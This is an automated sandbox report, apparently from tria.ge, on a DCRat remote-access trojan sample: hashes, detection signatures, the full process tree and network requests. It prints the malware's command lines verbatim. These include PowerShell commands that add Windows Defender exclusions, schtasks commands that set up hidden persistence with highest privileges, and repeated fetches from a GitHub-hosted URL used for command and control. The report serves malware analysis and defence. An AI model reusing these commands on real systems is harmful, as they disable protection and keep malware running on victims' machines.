Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/12/2024, 21:00 UTC

General

  • Target

    JaffaCakes118_6afe87e10202ebcb0832444fd37af764a888e1080311107587df22bdc31abbb3.exe

  • Size

    1.3MB

  • MD5

    10c386e880209d4025bdf3b29ce4a48d

  • SHA1

    02d8babcffff08f5cf6da5b771045384bdc8036d

  • SHA256

    6afe87e10202ebcb0832444fd37af764a888e1080311107587df22bdc31abbb3

  • SHA512

    03c63901e6f13f6e446a017de6d0faa9d4cfd77146c48f2d1c22affd50ab6a2765199cf9e02e532c24dfc827e6816d6ba91442c7e88f5b909273a911c822a3da

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 24 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 2 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 14 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 24 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6afe87e10202ebcb0832444fd37af764a888e1080311107587df22bdc31abbb3.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6afe87e10202ebcb0832444fd37af764a888e1080311107587df22bdc31abbb3.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3112
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:548
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2164
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:728
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4528
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1516
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\conhost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\lsass.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4620
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Idle.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4380
          • C:\providercommon\lsass.exe
            "C:\providercommon\lsass.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:872
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XdxpZ3I66P.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4572
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:944
                • C:\providercommon\lsass.exe
                  "C:\providercommon\lsass.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4740
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nGW3UwTeX7.bat"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2036
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      9⤵
                        PID:3344
                      • C:\providercommon\lsass.exe
                        "C:\providercommon\lsass.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1136
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gWC6ojzqIZ.bat"
                          10⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4800
                          • C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            11⤵
                              PID:2772
                            • C:\providercommon\lsass.exe
                              "C:\providercommon\lsass.exe"
                              11⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2444
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rHhDMS4c5i.bat"
                                12⤵
                                • Suspicious use of WriteProcessMemory
                                PID:372
                                • C:\Windows\system32\w32tm.exe
                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  13⤵
                                    PID:4028
                                  • C:\providercommon\lsass.exe
                                    "C:\providercommon\lsass.exe"
                                    13⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:872
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SaOkt9ru2m.bat"
                                      14⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1968
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        15⤵
                                          PID:3516
                                        • C:\providercommon\lsass.exe
                                          "C:\providercommon\lsass.exe"
                                          15⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:3680
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UWQnaEvoMY.bat"
                                            16⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:4472
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              17⤵
                                                PID:3528
                                              • C:\providercommon\lsass.exe
                                                "C:\providercommon\lsass.exe"
                                                17⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3452
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EtrZeLjFvq.bat"
                                                  18⤵
                                                    PID:1180
                                                    • C:\Windows\system32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      19⤵
                                                        PID:3392
                                                      • C:\providercommon\lsass.exe
                                                        "C:\providercommon\lsass.exe"
                                                        19⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1892
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tDjG3X7WPV.bat"
                                                          20⤵
                                                            PID:2840
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              21⤵
                                                                PID:3028
                                                              • C:\providercommon\lsass.exe
                                                                "C:\providercommon\lsass.exe"
                                                                21⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4660
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nGW3UwTeX7.bat"
                                                                  22⤵
                                                                    PID:4536
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      23⤵
                                                                        PID:5052
                                                                      • C:\providercommon\lsass.exe
                                                                        "C:\providercommon\lsass.exe"
                                                                        23⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4696
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RjWoOVK6wo.bat"
                                                                          24⤵
                                                                            PID:3048
                                                                            • C:\Windows\system32\w32tm.exe
                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                              25⤵
                                                                                PID:3148
                                                                              • C:\providercommon\lsass.exe
                                                                                "C:\providercommon\lsass.exe"
                                                                                25⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4140
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Zi7wkUpBKE.bat"
                                                                                  26⤵
                                                                                    PID:2672
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      27⤵
                                                                                        PID:3672
                                                                                      • C:\providercommon\lsass.exe
                                                                                        "C:\providercommon\lsass.exe"
                                                                                        27⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:940
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CxpWyGgMb4.bat"
                                                                                          28⤵
                                                                                            PID:2360
                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                              29⤵
                                                                                                PID:4460
                                                                                              • C:\providercommon\lsass.exe
                                                                                                "C:\providercommon\lsass.exe"
                                                                                                29⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4556
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\providercommon\lsass.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4472
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2240
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1328
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2992
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3268
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1392
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Mozilla Firefox\csrss.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2464
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\csrss.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2772
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Mozilla Firefox\csrss.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4424
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\providercommon\conhost.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3608
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3680
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3100
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\providercommon\conhost.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4312
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1668
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\providercommon\conhost.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:384
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4968
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:584
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4900
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Idle.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1952
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1748
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4252
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2300
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2728
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
                                        1⤵
                                        • Process spawned unexpected child process
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4572

                                      Network

                                      • flag-us
                                        DNS
                                        228.249.119.40.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        228.249.119.40.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        83.210.23.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        83.210.23.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        83.210.23.2.in-addr.arpa
                                        IN PTR
                                        a2-23-210-83deploystaticakamaitechnologiescom
                                      • flag-us
                                        DNS
                                        73.159.190.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        73.159.190.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        95.221.229.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        95.221.229.192.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        raw.githubusercontent.com
                                        lsass.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        raw.githubusercontent.com
                                        IN A
                                        Response
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.110.133
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.108.133
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.109.133
                                        raw.githubusercontent.com
                                        IN A
                                        185.199.111.133
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:00:51 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lon4244-LON
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814852.614708,VS0,VE1
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: c9c34a2daacce2ec2382ad389889572a5ff9b3bb
                                        Expires: Sat, 21 Dec 2024 21:05:51 GMT
                                        Source-Age: 18
                                      • flag-us
                                        DNS
                                        133.110.199.185.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        133.110.199.185.in-addr.arpa
                                        IN PTR
                                        Response
                                        133.110.199.185.in-addr.arpa
                                        IN PTR
                                        cdn-185-199-110-133githubcom
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:01:00 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lcy-eglc8600068-LCY
                                        X-Cache: HIT
                                        X-Cache-Hits: 2
                                        X-Timer: S1734814861.996808,VS0,VE0
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: bf9ccc05846334574a32f104f5ef9ffed14bcdc7
                                        Expires: Sat, 21 Dec 2024 21:06:00 GMT
                                        Source-Age: 235
                                      • flag-us
                                        DNS
                                        13.86.106.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        13.86.106.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        50.23.12.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        50.23.12.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        50.23.12.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        50.23.12.20.in-addr.arpa
                                        IN PTR
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: raw.githubusercontent.com
                                        Connection: Keep-Alive
                                        Response
                                        HTTP/1.1 200 OK
                                        Connection: keep-alive
                                        Content-Length: 4
                                        Cache-Control: max-age=300
                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                        Content-Type: text/plain; charset=utf-8
                                        ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                        Strict-Transport-Security: max-age=31536000
                                        X-Content-Type-Options: nosniff
                                        X-Frame-Options: deny
                                        X-XSS-Protection: 1; mode=block
                                        X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                        Accept-Ranges: bytes
                                        Date: Sat, 21 Dec 2024 21:01:16 GMT
                                        Via: 1.1 varnish
                                        X-Served-By: cache-lcy-eglc8600093-LCY
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1734814876.274063,VS0,VE2
                                        Vary: Authorization,Accept-Encoding,Origin
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        X-Fastly-Request-ID: 26d819bcb94b75ad62390b59303437a5b318f1a9
                                        Expires: Sat, 21 Dec 2024 21:06:16 GMT
                                        Source-Age: 249
                                      • flag-us
                                        DNS
                                        15.164.165.52.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        15.164.165.52.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        172.210.232.199.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        172.210.232.199.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        GET
                                        https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                        lsass.exe
                                        Remote address:
                                        185.199.110.133:443
                                        Request
                                        GET /justbio123/raven/main/api.txt HTTP/1.1
